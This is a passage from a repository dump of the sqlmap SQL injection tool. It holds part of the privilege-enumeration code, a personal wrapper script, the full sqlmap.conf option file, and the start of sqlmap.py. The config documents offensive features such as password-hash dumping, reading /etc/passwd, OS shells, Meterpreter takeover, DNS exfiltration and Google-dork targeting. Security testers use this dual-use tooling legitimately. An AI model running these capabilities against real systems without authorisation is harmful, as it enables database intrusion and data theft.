privileges.add(FIREBIRD_PRIVS[privilege.strip()])\n\n                    # In Informix we get one letter for the highest privilege\n                    elif Backend.isDbms(DBMS.INFORMIX):\n                        if privilege.strip() in INFORMIX_PRIVS:\n                            privileges.add(INFORMIX_PRIVS[privilege.strip()])\n\n                    # In DB2 we get Y or G if the privilege is\n                    # True, N otherwise\n                    elif Backend.isDbms(DBMS.DB2):\n                        privs = privilege.split(',')\n                        privilege = privs[0]\n                        privs = privs[1]\n                        privs = list(privs.strip())\n                        i = 1\n\n                        for priv in privs:\n                            if priv.upper() in ('Y', 'G'):\n                                for position, db2Priv in DB2_PRIVS.items():\n                                    if position == i:\n                                        privilege += \", \" + db2Priv\n\n                            i += 1\n\n                        privileges.add(privilege)\n\n                    # In MySQL < 5.0 we break the cycle after the first\n                    # time we get the user's privileges otherwise we\n                    # duplicate the same query\n                    if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:\n                        break\n\n                if privileges:\n                    kb.data.cachedUsersPrivileges[user] = list(privileges)\n                else:\n                    warnMsg = \"unable to retrieve the privileges \"\n                    warnMsg += \"for user '%s'\" % outuser\n                    logger.warning(warnMsg)\n\n                retrievedUsers.add(user)\n\n        if not kb.data.cachedUsersPrivileges:\n            errMsg = \"unable to retrieve the privileges \"\n            errMsg += \"for the database users\"\n            raise SqlmapNoneDataException(errMsg)\n\n        for user, privileges in kb.data.cachedUsersPrivileges.items():\n            if isAdminFromPrivileges(privileges):\n                areAdmins.add(user)\n\n        return (kb.data.cachedUsersPrivileges, areAdmins)\n\n    def getRoles(self, query2=False):\n        warnMsg = \"on %s the concept of roles does not \" % Backend.getIdentifiedDbms()\n        warnMsg += \"exist. sqlmap will enumerate privileges instead\"\n        logger.warning(warnMsg)\n\n        return self.getPrivileges(query2)\n"
  },
  {
    "path": "sqlmap/sqlmap",
    "content": "#!/bin/sh\npython3 /Users/gzemel/Desktop/CompSci/Hacking/WebHeck/sqlmap/sqlmap.py -url $url —-level 5 --smart"
  },
  {
    "path": "sqlmap/sqlmap.conf",
    "content": "# At least one of these options has to be specified to set the source to\n# get target URLs from.\n[Target]\n\n# Target URL.\n# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2\nurl =\n\n# Direct connection to the database.\n# Examples:\n#   mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME\n#   oracle://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_SID\ndirect = \n\n# Parse targets from Burp or WebScarab logs\n# Valid: Burp proxy (http://portswigger.net/suite/) requests log file path\n# or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)\n# 'conversations/' folder path\nlogFile = \n\n# Scan multiple targets enlisted in a given textual file\nbulkFile =\n\n# Load HTTP request from a file\n# Example (file content): POST /login.jsp HTTP/1.1\\nHost: example.com\\nUser-Agent: Mozilla/4.0\\n\\nuserid=joe&password=guessme\nrequestFile = \n\n# Rather than providing a target URL, let Google return target\n# hosts as result of your Google dork expression. For a list of Google\n# dorks see Johnny Long Google Hacking Database at\n# http://johnny.ihackstuff.com/ghdb.php.\n# Example: +ext:php +inurl:\"&id=\" +intext:\"powered by \"\ngoogleDork = \n\n\n# These options can be used to specify how to connect to the target URL.\n[Request]\n\n# Force usage of given HTTP method (e.g. PUT).\nmethod = \n\n# Data string to be sent through POST (e.g. \"id=1\").\ndata = \n\n# Character used for splitting parameter values (e.g. &).\nparamDel = \n\n# HTTP Cookie header value (e.g. \"PHPSESSID=a8d127e..\").\ncookie = \n\n# Character used for splitting cookie values (e.g. ;).\ncookieDel = \n\n# Live cookies file used for loading up-to-date values.\nliveCookies = \n\n# File containing cookies in Netscape/wget format.\nloadCookies = \n\n# Ignore Set-Cookie header from response.\n# Valid: True or False\ndropSetCookie = False\n\n# HTTP User-Agent header value. Useful to fake the HTTP User-Agent header value\n# at each HTTP request.\n# sqlmap will also test for SQL injection on the HTTP User-Agent value.\nagent =\n\n# Imitate smartphone through HTTP User-Agent header.\n# Valid: True or False\nmobile = False\n\n# Use randomly selected HTTP User-Agent header value.\n# Valid: True or False\nrandomAgent = False\n\n# HTTP Host header value.\nhost = \n\n# HTTP Referer header. Useful to fake the HTTP Referer header value at\n# each HTTP request.\nreferer = \n\n# Extra HTTP headers\nheaders = Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n Accept-Language: en-us,en;q=0.5\n Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7\n\n# HTTP Authentication type. Useful only if the target URL requires\n# HTTP Basic, Digest, Bearer or NTLM authentication and you have such data.\n# Valid: Basic, Digest, Bearer, NTLM or PKI\nauthType = \n\n# HTTP authentication credentials. Useful only if the target URL requires\n# HTTP Basic, Digest, Token or NTLM authentication and you have such data.\n# Syntax: username:password\nauthCred = \n\n# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires\n# PKI authentication and you have such data.\n# Syntax: key_file\nauthFile = \n\n# Ignore (problematic) HTTP error code (e.g. 401).\n# Valid: integer\nignoreCode =\n\n# Ignore system default proxy settings.\n# Valid: True or False\nignoreProxy = False\n\n# Ignore redirection attempts.\n# Valid: True or False\nignoreRedirects = False\n\n# Ignore connection timeouts.\n# Valid: True or False\nignoreTimeouts = False\n\n# Use a proxy to connect to the target URL.\n# Syntax: (http|https|socks4|socks5)://address:port\nproxy = \n\n# Proxy authentication credentials. Useful only if the proxy requires\n# Basic or Digest authentication and you have such data.\n# Syntax: username:password\nproxyCred =\n\n# Load proxy list from a file\nproxyFile =\n\n# Use Tor anonymity network.\n# Valid: True or False\ntor = False\n\n# Set Tor proxy port other than default.\n# Valid: integer\n# torPort =\n\n# Set Tor proxy type.\n# Valid: HTTP, SOCKS4, SOCKS5\ntorType = SOCKS5\n\n# Check to see if Tor is used properly.\n# Valid: True or False\ncheckTor = False\n\n# Delay in seconds between each HTTP request.\n# Valid: float\n# Default: 0\ndelay = 0\n\n# Seconds to wait before timeout connection.\n# Valid: float\n# Default: 30\ntimeout = 30\n\n# Maximum number of retries when the HTTP connection timeouts.\n# Valid: integer\n# Default: 3\nretries = 3\n\n# Retry request on regexp matching content.\nretryOn =\n\n# Randomly change value for the given parameter.\nrParam = \n\n# URL address to visit frequently during testing.\n# Example: http://192.168.1.121/index.html\nsafeUrl = \n\n# POST data to send to a safe URL.\n# Example: username=admin&password=passw0rd!\nsafePost = \n\n# Load safe HTTP request from a file.\nsafeReqFile = \n\n# Regular requests between visits to a safe URL (default 0).\n# Valid: integer\n# Default: 0\nsafeFreq = 0\n\n# Skip URL encoding of payload data.\n# Valid: True or False\nskipUrlEncode = False\n\n# Parameter used to hold anti-CSRF token.\ncsrfToken = \n\n# URL address to visit to extract anti-CSRF token\ncsrfUrl = \n\n# HTTP method to use during anti-CSRF token page visit.\ncsrfMethod =\n\n# Retries for anti-CSRF token retrieval.\ncsrfRetries =\n\n# Force usage of SSL/HTTPS\n# Valid: True or False\nforceSSL = False\n\n# Use HTTP chunked transfer encoded requests.\n# Valid: True or False\nchunked = False\n\n# Use HTTP parameter pollution.\n# Valid: True or False\nhpp = False\n\n# Evaluate provided Python code before the request.\n# Example: import hashlib;id2=hashlib.md5(id).hexdigest()\nevalCode = \n\n# These options can be used to optimize the performance of sqlmap.\n[Optimization]\n\n# Use all optimization options.\n# Valid: True or False\noptimize = False\n\n# Predict common queries output.\n# Valid: True or False\npredictOutput = False\n\n# Use persistent HTTP(s) connections.\nkeepAlive = False\n\n# Retrieve page length without actual HTTP response body.\n# Valid: True or False\nnullConnection = False\n\n# Maximum number of concurrent HTTP(s) requests (handled with Python threads)\n# to be used in the inference SQL injection attack.\n# Valid: integer\n# Default: 1\nthreads = 1\n\n\n# These options can be used to specify which parameters to test for,\n# provide custom injection payloads and optional tampering scripts.\n[Injection]\n\n# Testable parameter(s) comma separated. By default all GET/POST/Cookie\n# parameters and HTTP User-Agent are tested by sqlmap.\ntestParameter = \n\n# Skip testing for given parameter(s).\nskip =\n\n# Skip testing parameters that not appear to be dynamic.\n# Valid: True or False\nskipStatic = False\n\n# Regexp to exclude parameters from testing (e.g. \"ses\").\nparamExclude =\n\n# Select testable parameter(s) by place (e.g. \"POST\").\nparamFilter =\n\n# Force back-end DBMS to provided value. If this option is set, the back-end\n# DBMS identification process will be minimized as needed.\n# If not set, sqlmap will detect back-end DBMS automatically by default.\n# Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql, sqlite, sqlite3,\n# access, firebird, maxdb, sybase\ndbms = \n\n# DBMS authentication credentials (user:password). Useful if you want to\n# run SQL statements as another user, the back-end database management\n# system is PostgreSQL or Microsoft SQL Server and the parameter is\n# vulnerable by stacked queries SQL injection or you are connecting directly\n# to the DBMS (-d switch).\n# Syntax: username:password\ndbmsCred = \n\n# Force back-end DBMS operating system to provided value. If this option is\n# set, the back-end DBMS identification process will be minimized as\n# needed.\n# If not set, sqlmap will detect back-end DBMS operating system\n# automatically by default.\n# Valid: linux, windows\nos = \n\n# Use big numbers for invalidating values.\n# Valid: True or False\ninvalidBignum = False\n\n# Use logical operations for invalidating values.\n# Valid: True or False\ninvalidLogical = False\n\n# Use random strings for invalidating values.\n# Valid: True or False\ninvalidString = False\n\n# Turn off payload casting mechanism\n# Valid: True or False\nnoCast = False\n\n# Turn off string escaping mechanism\n# Valid: True or False\nnoEscape = False\n\n# Injection payload prefix string.\nprefix = \n\n# Injection payload suffix string.\nsuffix = \n\n# Use given script(s) for tampering injection data.\ntamper = \n\n\n# These options can be used to specify how to parse and compare page\n# content from HTTP responses when using blind SQL injection technique.\n[Detection]\n\n# Level of tests to perform.\n# The higher the value is, the higher the number of HTTP(s) requests are\n# as well as the better chances to detect a tricky SQL injection.\n# Valid: Integer between 1 and 5\n# Default: 1\nlevel = 1\n\n# Risk of tests to perform.\n# Note: boolean-based blind SQL injection tests with AND are considered\n# risk 1, with OR are considered risk 3.\n# Valid: Integer between 1 and 3\n# Default: 1\nrisk = 1\n\n# String to match within the raw response when the query is evaluated to \n# True, only needed if the page content dynamically changes at each refresh.\n# Refer to the user's manual for further details.\nstring = \n\n# String to match within the raw response when the query is evaluated to \n# False, only needed if the page content dynamically changes at each refresh.\n# Refer to the user's manual for further details.\nnotString = \n\n# Regular expression to match within the raw response when the query is\n# evaluated to True, only needed if the needed if the page content\n# dynamically changes at each refresh.\n# Refer to the user's manual for further details.\n# Valid: regular expression with Python syntax\n# (http://www.python.org/doc/2.5.2/lib/re-syntax.html)\nregexp = \n\n# HTTP response code to match when the query is True.\n# Valid: Integer\n# Example: 200 (assuming any False statement returns a different response\n# code)\n# code = \n\n# Conduct thorough tests only if positive heuristic(s).\n# Valid: True or False\nsmart = False\n\n# Compare pages based only on the textual content.\n# Valid: True or False\ntextOnly = False\n\n# Compare pages based only on their titles.\n# Valid: True or False\ntitles = False\n\n\n# These options can be used to tweak testing of specific SQL injection\n# techniques.\n[Techniques]\n\n# SQL injection techniques to use.\n# Valid: a string composed by B, E, U, S, T and Q where:\n# B: Boolean-based blind SQL injection\n# E: Error-based SQL injection\n# U: UNION query SQL injection\n# S: Stacked queries SQL injection\n# T: Time-based blind SQL injection\n# Q: Inline SQL injection\n# Example: ES (means test for error-based and stacked queries SQL\n# injection types only)\n# Default: BEUSTQ (means test for all SQL injection types - recommended)\ntechnique = BEUSTQ\n\n# Seconds to delay the response from the DBMS.\n# Valid: integer\n# Default: 5\ntimeSec = 5\n\n# Range of columns to test for.\n# Valid: range of integers\n# Example: 1-10\nuCols = \n\n# Character to use for bruteforcing number of columns.\n# Valid: string\n# Example: NULL\nuChar = \n\n# Table to use in FROM part of UNION query SQL injection.\n# Valid: string\n# Example: INFORMATION_SCHEMA.COLLATIONS\nuFrom = \n\n# Domain name used for DNS exfiltration attack.\n# Valid: string\ndnsDomain =\n\n# Resulting page URL searched for second-order response.\n# Valid: string\nsecondUrl =\n\n# Load second-order HTTP request from file.\n# Valid: string\nsecondReq =\n\n\n[Fingerprint]\n\n# Perform an extensive back-end database management system fingerprint\n# based on various techniques.\n# Valid: True or False\nextensiveFp = False\n\n\n# These options can be used to enumerate the back-end database\n# management system information, structure and data contained in the\n# tables. Moreover you can run your own SQL statements.\n[Enumeration]\n\n# Retrieve everything\n# Valid: True or False\ngetAll = False\n\n# Retrieve back-end database management system banner.\n# Valid: True or False\ngetBanner = False\n\n# Retrieve back-end database management system current user.\n# Valid: True or False\ngetCurrentUser = False\n\n# Retrieve back-end database management system current database.\n# Valid: True or False\ngetCurrentDb = False\n\n# Retrieve back-end database management system server hostname.\n# Valid: True or False\ngetHostname = False\n\n# Detect if the DBMS current user is DBA.\n# Valid: True or False\nisDba = False\n\n# Enumerate back-end database management system users.\n# Valid: True or False\ngetUsers = False\n\n# Enumerate back-end database management system users password hashes.\n# Valid: True or False\ngetPasswordHashes = False\n\n# Enumerate back-end database management system users privileges.\n# Valid: True or False\ngetPrivileges = False\n\n# Enumerate back-end database management system users roles.\n# Valid: True or False\ngetRoles = False\n\n# Enumerate back-end database management system databases.\n# Valid: True or False\ngetDbs = False\n\n# Enumerate back-end database management system database tables.\n# Optional: db\n# Valid: True or False\ngetTables = False\n\n# Enumerate back-end database management system database table columns.\n# Optional: db, tbl, col\n# Valid: True or False\ngetColumns = False\n\n# Enumerate back-end database management system schema.\n# Valid: True or False\ngetSchema = False\n\n# Retrieve number of entries for table(s).\n# Valid: True or False\ngetCount = False\n\n# Dump back-end database management system database table entries.\n# Requires: tbl and/or col\n# Optional: db\n# Valid: True or False\ndumpTable = False\n\n# Dump all back-end database management system databases tables entries.\n# Valid: True or False\ndumpAll = False\n\n# Search column(s), table(s) and/or database name(s).\n# Requires: db, tbl or col\n# Valid: True or False\nsearch = False\n\n# Check for database management system database comments during enumeration.\n# Valid: True or False\ngetComments = False\n\n# Retrieve SQL statements being run on database management system.\n# Valid: True or False\ngetStatements = False\n\n# Back-end database management system database to enumerate.\ndb = \n\n# Back-end database management system database table(s) to enumerate.\ntbl = \n\n# Back-end database management system database table column(s) to enumerate.\ncol = \n\n# Back-end database management system identifiers (database(s), table(s) and column(s)) to not enumerate.\nexclude = \n\n# Pivot column name.\npivotColumn =\n\n# Use WHERE condition while table dumping (e.g. \"id=1\").\ndumpWhere = \n\n# Back-end database management system database user to enumerate.\nuser = \n\n# Exclude DBMS system databases when enumerating tables.\n# Valid: True or False\nexcludeSysDbs = False\n\n# First query output entry to retrieve\n# Valid: integer\n# Default: 0 (sqlmap will start to retrieve the table dump entries from\n# first one)\nlimitStart = 0\n\n# Last query output entry to retrieve\n# Valid: integer\n# Default: 0 (sqlmap will detect the number of table dump entries and\n# retrieve them until the last)\nlimitStop = 0\n\n# First query output word character to retrieve\n# Valid: integer\n# Default: 0 (sqlmap will enumerate the query output from the first\n# character)\nfirstChar = 0\n\n# Last query output word character to retrieve\n# Valid: integer\n# Default: 0 (sqlmap will enumerate the query output until the last\n# character)\nlastChar = 0\n\n# SQL statement to be executed.\n# Example: SELECT 'foo', 'bar'\nsqlQuery = \n\n# Prompt for an interactive SQL shell.\n# Valid: True or False\nsqlShell = False\n\n# Execute SQL statements from given file(s).\nsqlFile = \n\n\n# These options can be used to run brute force checks.\n[Brute force]\n\n# Check existence of common tables.\n# Valid: True or False\ncommonTables = False\n\n# Check existence of common columns.\n# Valid: True or False\ncommonColumns = False\n\n# Check existence of common files.\n# Valid: True or False\ncommonFiles = False\n\n\n# These options can be used to create custom user-defined functions.\n[User-defined function]\n\n# Inject custom user-defined functions\n# Valid: True or False\nudfInject = False\n\n# Local path of the shared library\nshLib = \n\n\n# These options can be used to access the back-end database management\n# system underlying file system.\n[File system]\n\n# Read a specific file from the back-end DBMS underlying file system.\n# Examples: /etc/passwd or C:\\boot.ini\nfileRead = \n\n# Write a local file to a specific path on the back-end DBMS underlying\n# file system.\n# Example: /tmp/sqlmap.txt or C:\\WINNT\\Temp\\sqlmap.txt\nfileWrite = \n\n# Back-end DBMS absolute filepath to write the file to.\nfileDest = \n\n\n# These options can be used to access the back-end database management\n# system underlying operating system.\n[Takeover]\n\n# Execute an operating system command.\n# Valid: operating system command\nosCmd = \n\n# Prompt for an interactive operating system shell.\n# Valid: True or False\nosShell = False\n\n# Prompt for an out-of-band shell, Meterpreter or VNC.\n# Valid: True or False\nosPwn = False\n\n# One click prompt for an out-of-band shell, Meterpreter or VNC.\n# Valid: True or False\nosSmb = False\n\n# Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored\n# procedure heap-based buffer overflow (MS09-004) exploitation.\n# Valid: True or False\nosBof = False\n\n# Database process' user privilege escalation.\n# Note: Use in conjunction with osPwn, osSmb or osBof. It will force the\n# payload to be Meterpreter.\nprivEsc = False\n\n# Local path where Metasploit Framework is installed.\n# Valid: file system path\nmsfPath = \n\n# Remote absolute path of temporary files directory.\n# Valid: absolute file system path\ntmpPath = \n\n\n# These options can be used to access the back-end database management\n# system Windows registry.\n[Windows]\n\n# Read a Windows registry key value.\n# Valid: True or False\nregRead = False\n\n# Write a Windows registry key value data.\n# Valid: True or False\nregAdd = False\n\n# Delete a Windows registry key value.\n# Valid: True or False\nregDel = False\n\n# Windows registry key.\nregKey = \n\n# Windows registry key value.\nregVal = \n\n# Windows registry key value data.\nregData = \n\n# Windows registry key value type.\nregType = \n\n\n# These options can be used to set some general working parameters.\n[General]\n\n# Load session from a stored (.sqlite) file\n# Example: output/www.target.com/session.sqlite\nsessionFile = \n\n# Log all HTTP traffic into a textual file.\ntrafficFile = \n\n# Set predefined answers (e.g. \"quit=N,follow=N\").\nanswers =\n\n# Parameter(s) containing Base64 encoded data\nbase64Parameter =\n\n# Use URL and filename safe Base64 alphabet (Reference: https://en.wikipedia.org/wiki/Base64#URL_applications).\n# Valid: True or False\nbase64Safe = False\n\n# Never ask for user input, use the default behaviour.\n# Valid: True or False\nbatch = False\n\n# Result fields having binary values (e.g. \"digest\").\nbinaryFields =\n\n# Check Internet connection before assessing the target.\ncheckInternet = False\n\n# Clean up the DBMS from sqlmap specific UDF and tables.\n# Valid: True or False\ncleanup = False\n\n# Crawl the website starting from the target URL.\n# Valid: integer\n# Default: 0\ncrawlDepth = 0\n\n# Regexp to exclude pages from crawling (e.g. \"logout\").\ncrawlExclude =\n\n# Delimiting character used in CSV output.\n# Default: ,\ncsvDel = ,\n\n# Format of dumped data\n# Valid: CSV, HTML or SQLITE\ndumpFormat = CSV\n\n# Force character encoding used for data retrieval.\nencoding = \n\n# Retrieve each query output length and calculate the estimated time of\n# arrival in real time.\n# Valid: True or False\neta = False\n\n# Flush session files for current target.\n# Valid: True or False\nflushSession = False\n\n# Parse and test forms on target URL.\n# Valid: True or False\nforms = False\n\n# Ignore query results stored in session file.\n# Valid: True or False\nfreshQueries = False\n\n# Use Google dork results from specified page number.\n# Valid: integer\n# Default: 1\ngooglePage = 1\n\n# Use hex conversion during data retrieval.\n# Valid: True or False\nhexConvert = False\n\n# Custom output directory path.\noutputDir =\n\n# Parse and display DBMS error messages from responses.\n# Valid: True or False\nparseErrors = False\n\n# Use given script(s) for preprocessing of request.\npreprocess =\n\n# Use given script(s) for postprocessing of response data.\npostprocess =\n\n# Redump entries having unknown character marker (?).\n# Valid: True or False\nrepair = False\n\n# Regular expression for filtering targets from provided Burp.\n# or WebScarab proxy log.\n# Example: (google|yahoo)\nscope = \n\n# Skip heuristic detection of SQLi/XSS vulnerabilities.\n# Valid: True or False\nskipHeuristics = False\n\n# Skip heuristic detection of WAF/IPS protection.\n# Valid: True or False\nskipWaf = False\n\n# Prefix used for temporary tables.\n# Default: sqlmap\ntablePrefix = sqlmap\n\n# Select tests by payloads and/or titles (e.g. ROW)\ntestFilter =\n\n# Skip tests by payloads and/or titles (e.g. BENCHMARK)\ntestSkip =\n\n# Web server document root directory (e.g. \"/var/www\").\nwebRoot =\n\n\n[Miscellaneous]\n\n# Run host OS command(s) when SQL injection is found.\nalert =\n\n# Beep on question and/or when SQL injection is found.\n# Valid: True or False\nbeep = False\n\n# Offline WAF/IPS payload detection testing.\n# Valid: True or False\ncheckPayload = False\n\n# Check for missing (optional) sqlmap dependencies.\n# Valid: True or False\ndependencies = False\n\n# Disable console output coloring.\n# Valid: True or False\ndisableColoring = False\n\n# Display list of available tamper scripts.\n# Valid: True or False\nlistTampers = False\n\n# Disable logging to a file.\n# Valid: True or False\nnoLogging = False\n\n# Work in offline mode (only use session data)\n# Valid: True or False\noffline = False\n\n# Location of CSV results file in multiple targets mode.\nresultsFile =\n\n# Local directory for storing temporary files.\ntmpDir =\n\n# Adjust options for unstable connections.\n# Valid: True or False\nunstable = False\n\n# Update sqlmap.\n# Valid: True or False\nupdateAll = False\n\n# Simple wizard interface for beginner users.\n# Valid: True or False\nwizard = False\n\n# Verbosity level.\n# Valid: integer between 0 and 6\n# 0: Show only error and critical messages\n# 1: Show also warning and info messages\n# 2: Show also debug messages\n# 3: Show also payloads injected\n# 4: Show also HTTP requests\n# 5: Show also HTTP responses' headers\n# 6: Show also HTTP responses' page content\n# Default: 1\nverbose = 1\n"
  },
  {
    "path": "sqlmap/sqlmap.py",
    "content": "#!/usr/bin/python3\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\ntry:\n    import sys\n\n    sys.dont_write_bytecode = True\n\n    try:\n        __import__(\"lib.utils.versioncheck\")  # this has to be the first non-standard import\n    except ImportError:\n        sys.exit(\"[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details\")\n\n    import bdb\n    import glob\n    import inspect\n    import json\n    import logging\n    import os\n    import re\n    import shutil\n    import sys\n    import tempfile\n    import threading\n    import time\n    import traceback\n    import warnings\n\n    if \"--deprecations\" not in sys.argv:\n        warnings.filterwarnings(action=\"ignore\", category=DeprecationWarning)\n    else:\n        warnings.resetwarnings()\n        warnings.filterwarnings(action=\"ignore\", message=\"'crypt'\", category=DeprecationWarning)\n        warnings.simplefilter(\"ignore\", category=ImportWarning)\n        if sys.version_info >= (3, 0):\n            warnings.simplefilter(\"ignore\", category=ResourceWarning)\n\n    warnings.filterwarnings(action=\"ignore\", message=\"Python 2 is no longer supported\")\n    warnings.filterwarnings(action=\"ignore\", message=\".*was already imported\", category=UserWarning)\n    warnings.filterwarnings(action=\"ignore\", message=\".*using a very old release\", category=UserWarning)\n    warnings.filterwarnings(action=\"ignore\", message=\".*default buffer size will be used\", category=RuntimeWarning)\n    warnings.filterwarnings(action=\"ignore\", category=UserWarning, module=\"psycopg2\")\n\n    from lib.core.data import logger\n\n    from lib.core.common import banner\n    from lib.core.common import checkIntegrity\n    from lib.core.common import checkPipedInput\n    from lib.core.common import createGithubIssue\n    from lib.core.common import dataToStdout\n    from lib.core.common import extractRegexResult\n    from lib.core.common import filterNone\n    from lib.core.common import getDaysFromLastUpdate\n    from lib.core.common import getFileItems\n    from lib.core.common import getSafeExString\n    from lib.core.common import maskSensitiveData\n    from lib.core.common import openFile\n    from lib.core.common import setPaths\n    from lib.core.common import weAreFrozen\n    from lib.core.convert import getUnicode\n    from lib.core.common import MKSTEMP_PREFIX\n    from lib.core.common import setColor\n    from lib.core.common import unhandledExceptionMessage\n    from lib.core.compat import LooseVersion\n    from lib.core.compat import xrange\n    from lib.core.data import cmdLineOptions\n    from lib.core.data import conf\n    from lib.core.data import kb\n    from lib.core.datatype import OrderedSet\n    from lib.core.exception import SqlmapBaseException\n    from lib.core.exception import SqlmapShellQuitException\n    from lib.core.exception import SqlmapSilentQuitException\n    from lib.core.exception import SqlmapUserQuitException\n    from lib.core.option import init\n    from lib.core.option import initOptions\n    from lib.core.patch import dirtyPatches\n    from lib.core.patch import resolveCrossReferences\n    from lib.core.settings import GIT_PAGE\n    from lib.core.settings import IS_WIN\n    from lib.core.settings import LAST_UPDATE_NAGGING_DAYS\n    from lib.core.settings import LEGAL_DISCLAIMER\n    from lib.core.settings import THREAD_FINALIZATION_TIMEOUT\n    from lib.core.settings import UNICODE_ENCODING\n    from lib.core.settings import VERSION\n    from lib.parse.cmdline import cmdLineParser\n    from lib.utils.crawler import crawl\nexcept KeyboardInterrupt:\n    errMsg = \"user aborted\"\n\n    if \"logger\" in globals():\n        logger.critical(errMsg)\n        raise SystemExit\n    else:\n        import time\n        sys.exit(\"\\r[%s] [CRITICAL] %s\" % (time.strftime(\"%X\"), errMsg))\n\ndef modulePath():\n    \"\"\"\n    This will get us the program's directory, even if we are frozen\n    using py2exe\n    \"\"\"\n\n    try:\n        _ = sys.executable if weAreFrozen() else __file__\n    except NameError:\n        _ = inspect.getsourcefile(modulePath)\n\n    return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)\n\ndef checkEnvironment():\n    try:\n        os.path.isdir(modulePath())\n    except UnicodeEncodeError:\n        errMsg = \"your system does not properly handle non-ASCII paths. \"\n        errMsg += \"Please move the sqlmap's directory to the other location\"\n        logger.critical(errMsg)\n        raise SystemExit\n\n    if LooseVersion(VERSION) < LooseVersion(\"1.0\"):\n        errMsg = \"your runtime environment (e.g. PYTHONPATH) is \"\n        errMsg += \"broken. Please make sure that you are not running \"\n        errMsg += \"newer versions of sqlmap with runtime scripts for older \"\n        errMsg += \"versions\"\n        logger.critical(errMsg)\n        raise SystemExit\n\n    # Patch for pip (import) environment\n    if \"sqlmap.sqlmap\" in sys.modules:\n        for _ in (\"cmdLineOptions\", \"conf\", \"kb\"):\n            globals()[_] = getattr(sys.modules[\"lib.core.data\"], _)\n\n        for _ in (\"SqlmapBaseException\", \"SqlmapShellQuitException\", \"SqlmapSilentQuitException\", \"SqlmapUserQuitException\"):\n            globals()[_] = getattr(sys.modules[\"lib.core.exception\"], _)\n\ndef main():\n    \"\"\"\n    Main function of sqlmap when running from command line.\n    \"\"\"\n\n    try:\n        dirtyPatches()\n        resolveCrossReferences()\n        checkEnvironment()\n        setPaths(modulePath())\n        banner()\n\n        # Store original command line options for possible later restoration\n        args = cmdLineParser()\n        cmdLineOptions.update(args.__dict__ if hasattr(args, \"__dict__\") else args)\n        initOptions(cmdLineOptions)\n\n        if checkPipedInput():\n            conf.batch = True\n\n        if conf.get(\"api\"):\n            # heavy imports\n            from lib.utils.api import StdDbOut\n            from lib.utils.api import setRestAPILog\n\n            # Overwrite system standard output and standard error to write\n            # to an IPC database\n            sys.stdout = StdDbOut(conf.taskid, messagetype=\"stdout\")\n            sys.stderr = StdDbOut(conf.taskid, messagetype=\"stderr\")\n\n            setRestAPILog()\n\n        conf.showTime = True\n        dataToStdout(\"[!] legal disclaimer: %s\\n\\n\" % LEGAL_DISCLAIMER, forceOutput=True)\n        dataToStdout(\"[*] starting @ %s\\n\\n\" % time.strftime(\"%X /%Y-%m-%d/\"), forceOutput=True)\n\n        init()\n\n        if not conf.updateAll:\n            # Postponed imports (faster start)\n            if conf.smokeTest:\n                from lib.core.testing import smokeTest\n                os._exitcode = 1 - (smokeTest() or 0)\n            elif conf.vulnTest:\n                from lib.core.testing import vulnTest\n                os._exitcode = 1 - (vulnTest() or 0)\n            else:\n                from lib.controller.controller import start\n                if conf.profile:\n                    from lib.core.profiling import profile\n                    globals()[\"start\"] = start\n                    profile()\n                else:\n                    try:\n                        if conf.crawlDepth and conf.bulkFile:\n                            targets = getFileItems(conf.bulkFile)\n\n                            for i in xrange(len(targets)):\n                                target = None\n\n                                try:\n                                    kb.targets = OrderedSet()\n                                    target = targets[i]\n\n                                    if not re.search(r\"(?i)\\Ahttp[s]*://\", target):\n                                        target = \"http://%s\" % target\n\n                                    infoMsg = \"starting crawler for target URL '%s' (%d/%d)\" % (target, i + 1, len(targets))\n                                    logger.info(infoMsg)\n\n                                    crawl(target)\n                                except Exception as ex:\n                                    if target and not isinstance(ex, SqlmapUserQuitException):\n                                        errMsg = \"problem occurred while crawling '%s' ('%s')\" % (target, getSafeExString(ex))\n                                        logger.error(errMsg)\n                                    else:\n                                        raise\n                                else:\n                                    if kb.targets:\n                                        start()\n                        else:\n                            start()\n                    except Exception as ex:\n                        os._exitcode = 1\n\n                        if \"can't start new thread\" in getSafeExString(ex):\n                            errMsg = \"unable to start new threads. Please check OS (u)limits\"\n                            logger.critical(errMsg)\n                            raise SystemExit\n                        else:\n                            raise\n\n    except SqlmapUserQuitException:\n        if not conf.batch:\n            errMsg = \"user quit\"\n            logger.error(errMsg)\n\n    except (SqlmapSilentQuitException, bdb.BdbQuit):\n        pass\n\n    except SqlmapShellQuitException:\n        cmdLineOptions.sqlmapShell = False\n\n    except SqlmapBaseException as ex:\n        errMsg = getSafeExString(ex)\n        logger.critical(errMsg)\n\n        os._exitcode = 1\n\n        raise SystemExit\n\n    except KeyboardInterrupt:\n        print()\n\n    except EOFError:\n        print()\n\n        errMsg = \"exit\"\n        logger.error(errMsg)\n\n    except SystemExit as ex:\n        os._exitcode = ex.code or 0\n\n    except:\n        print()\n        errMsg = unhandledExceptionMessage()\n        excMsg = traceback.format_exc()\n        valid = checkIntegrity()\n\n        os._exitcode = 255\n\n        if any(_ in excMsg for _ in (\"MemoryError\", \"Cannot allocate memory\")):\n            errMsg = \"memory exhaustion detected\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif any(_ in excMsg for _ in (\"No space left\", \"Disk quota exceeded\", \"Disk full while accessing\")):\n            errMsg = \"no space left on output device\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif any(_ in excMsg for _ in (\"The paging file is too small\",)):\n            errMsg = \"no space left for paging file\"\n            logger.critical(errMsg)\n            raise SystemExit\n\n        elif all(_ in excMsg for _ in (\"Access is denied\", \"subprocess\", \"metasploit\")):\n            errMsg = \"permission error occurred while 